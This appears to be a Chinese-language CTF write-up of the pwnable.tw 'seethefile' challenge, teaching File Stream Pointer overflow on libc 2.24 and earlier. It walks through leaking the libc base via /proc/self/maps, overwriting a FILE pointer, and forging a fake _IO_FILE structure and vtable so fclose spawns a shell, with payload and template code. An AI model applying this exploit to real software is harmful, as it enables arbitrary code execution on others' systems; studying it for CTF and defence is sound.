pwnable.tw做到250pt就连偷看wp也领悟不能,exp是不可能会写的,shellcode编码也是编不出来的,比较有眼缘的一道seethefile,在看了大佬哄完女票睡觉后的文章之后迫不及待尝试了一个demo也失败了。
身边的大佬说libc新版会有检查,我以为只是为了安慰我,时隔半年再翻出来终于在google字缝里看到了libc<=2.24这个说法。不信邪拿2.26硬试,一点一点仿照正常流程修改伪造的结构体,最后卡在vtable检查函数之前一筹莫展。
先把demo放在一边,拿出seethefile试了下vmmap发现libc用的是2.23,善。
0x00 首先搬运一下关于File结构体的姿势:
参考自:
暂时没找到bin的东华杯pwn450 wp 溢出利用FILE结构体 --安全客
以及情人节这天膜起来分外寒冷的 Head First FILE Stream Pointer Overflow --WooYun知识库
1.struct _IO_FILE
![File Stream Pointer Overflow [libc<=2.24]_第1张图片](http://img.e-com-net.com/image/info10/68302cdc7f664e90bf04530bb94bab94.png)
2.平常使用file结构体的情景:
FILE* fp=fopen( "file name" , "r" ) ;
事实上,系统并不是直接分配的FILE(_IO_FILE)结构体,而是名字为_IO_FILE_plus结构体,这个结构体包含了_IO_FILE结构体,还包含了一个虚函数表指针:
![File Stream Pointer Overflow [libc<=2.24]_第2张图片](http://img.e-com-net.com/image/info10/cbecdc6e836548cba64451a2c3e409e9.jpg)
vtable指向的内容:
![File Stream Pointer Overflow [libc<=2.24]_第3张图片](http://img.e-com-net.com/image/info10/c2d6fbafa659436fb2fc2990282228d8.png)
整体上大致如下:
![File Stream Pointer Overflow [libc<=2.24]_第4张图片](http://img.e-com-net.com/image/info10/924fcb81d10b4394a46a9fee7af2bf63.jpg)
利用的思路就是想办法溢出覆盖掉fp,使其指向一块可控的内存区域,并在该位置伪造_IO_FILE_plus结构体,以及vtable指向的函数表,最后在函数表相应位置填入system地址来拿shell。
0x01 pwnable.tw之seethefile
实际上是拿这道题作为入门fsp(File Stream Pointer Overflow)的一个demo。
1.首先程序流程分析,功能菜单有打开文件,读文件,写文件,关闭文件,退出时一个scanf加%s是溢出点可以覆盖掉fp指针,需要32bytes的paddings。
![File Stream Pointer Overflow [libc<=2.24]_第5张图片](http://img.e-com-net.com/image/info10/b87a35714e894fb8bff5038440733119.png)
2.因为这里fp指针保存在bss段而非栈或堆上,所以不需要泄露栈地址或堆地址了,给了libc.so的话只需要泄露libc基址。因为有读文件的功能很敏感的想到linux系统本身的文件机制,而且读文件的时候只对诸如“flag”、“Flag”、“{”做了检查,显然可以读取/proc/self/maps来泄露程序内存映像:
![File Stream Pointer Overflow [libc<=2.24]_第6张图片](http://img.e-com-net.com/image/info10/a4009cd34ba546f281873f6c2091da69.png)
还是熟悉的味道,还是熟悉的maps,没毛病!因为读文件每次只读了399字节,所以要多读几次,得到libc基址,结合题目给的libc.so得到system实际地址。
3.接着开始主要工作,fsp的利用。首先根据标准的 _IO_FILE结构体(例如stderr)做一个fake_struct的雏形:
![File Stream Pointer Overflow [libc<=2.24]_第7张图片](http://img.e-com-net.com/image/info10/6ef41d91b4d541daa8df0c8f18532684.jpg)
其中所有地址因为地址随机化的缘故可能都不能用了,先用'AAAA'或者'BBBB'替换掉,其他位置照抄就可以。另外一些文章里面关于_IO_FILE结构体大小是
160字节
的说法应该有一点问题,_IO_FILE的大小应该是0x94(148)字节。
暂时为'AAAA'的部分直接替换成一个可读可写的地址就可以(这里用name的地址),至于'BBBB'应指向vtable,因为这里准备直接把函数表vtable放在fake_struct后面,所以'BBBB'替换为fake_struct的起始地址+0x98
紧跟在fake_struct后面放置伪造的函数表,结合原本的vtable:
把开始的两个四字节置全0,剩下的全部置为system的地址:
payload='\x00'*32+p32(0x804b284)+fake_struct+p32(0)*2+p32(system_addr)*15 + p32(system_addr))
经过调试可以发现,fclose()实际的实现过程是先调用_IO_file_close_it(其中_IO_FILE结构起始地址作为第一个参数)
![File Stream Pointer Overflow [libc<=2.24]_第8张图片](http://img.e-com-net.com/image/info10/2897134d489c45fe9dc5d584a66d609d.jpg)
单步步入,最后发现实际上对函数表的查找和调用位于_IO_file_close_it+271
此时eax的值为vtable函数表的起始地址,执行offset :0x44即vtable[17]处的函数,我们往fake vtable中填入了2个零指针和16个system指针,显然够用了。这时栈顶存放的正是_IO_file_close_it的第一个参数,前面已经把_IO_FILE的开始位置填入"/bin/sh\x00",从而相当于执行了system("/bin/sh")成功拿到shell!
最后放上fake _IO_FILE struct和fake vtable的样板:
fake_struct=[ '/bin/sh\x00' ,'\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','AAAA' ,'\x03\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','AAAA' ,'\xff\xff\xff\xff', '\xff\xff\xff\xff','\x00\x00\x00\x00','AAAA' ,'\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','BBBB' ]
fake_struct=''.join(fake_struct)
fake_struct=fake_struct.replace('AAAA',p32(addr1)) #可读写的有效地址
fake_struct=fake_struct.replace('BBBB',p32(addr2)) # _IO_FILE struct 起始地址+0x98
vtable=p32(0)*2
vtable+=p32(system_addr)*16
仅适用于libc<=2.24
感兴趣的同学也可以钻研一波libc2.26的fsp利用。